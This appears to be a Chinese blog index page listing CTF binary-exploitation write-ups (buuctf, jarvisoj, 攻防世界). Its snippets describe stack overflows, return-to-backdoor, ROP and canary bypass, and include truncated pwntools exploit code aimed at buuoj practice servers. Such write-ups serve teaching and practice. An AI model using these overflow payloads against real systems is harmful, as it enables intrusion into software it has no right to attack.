![](https://img-blog.csdnimg.cn/20201014180756923.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
pwn
文章平均质量分 58
@See you later
道阻且长,行则将至
展开
-
buuctf ---- getshell集合(未完)
buuctf ----- jarvisoj_tell_me_something运行程序得使用64IDA查看程序可以看到存在溢出漏洞查看字符串,发现flag.txt存在后门函数,该函数的含义是输出flag思路:改变ret addr 为good_game函数的地址。编写expfrom pwn import*io = remote("node4.buuoj.cn",29817)bin_addr = 0x400620payload = 'a'*0x8c+p64(bin_addr)原创 2022-01-27 00:08:03 · 3632 阅读 · 0 评论 -
buuctf ---- ROP集合(未完)
buuctf ---------- babyrop1NX栈不可执行开启使用32位IDA查看程序读取输入,进行字符串比较,不同则退出,相同则返回输入的第8个字节,可以通过输入 \0 绕过字符串比较a1可以是255,造成buf溢出。编写expfrom pwn import *from LibcSearcher import *io=remote("node4.buuoj.cn",28966)elf=ELF("pwn")write_plt=elf.plt['write']puts_原创 2022-01-27 00:02:01 · 2696 阅读 · 0 评论 -
buuctf ---- jarvisoj_level(全)
buuctf ----- jarvisoj_level0运行一下程序使用64位的IDA查看程序查看vulner_function函数发现buf存在溢出漏洞,buf是0x80,read了0x200 存在栈溢出漏洞发现后门函数system("/bin/sh"),解题思路:修改read函数的ret address 为后门函数的地址。编写expfrom pwn import*io=remote("node4.buuoj.cn",26034)sys_addr=0x0400596pa原创 2022-01-22 21:49:04 · 3548 阅读 · 0 评论 -
攻防世界pwn--持续更新
一道攻防世界的pwn题 Mary_Morton好久都不写WP了,太懒了,emmm,以后坚持更新。用checksec查看保护机制这里的11就是本题,我嫌弃题的名字长就换了一个,emmm,有栈不可执行,栈溢出保护–canary。用IDA查看伪代码输入v3的数值来判断流程的跳转输入1进入sub_400960()函数输入2进入sub_4008EB()函数发现后门函数很明显就是canary保护解题的大致思路就是,通过栈溢出,来执行后门函数,canary用格式化字符串来绕过。sub_原创 2021-10-30 21:31:52 · 646 阅读 · 0 评论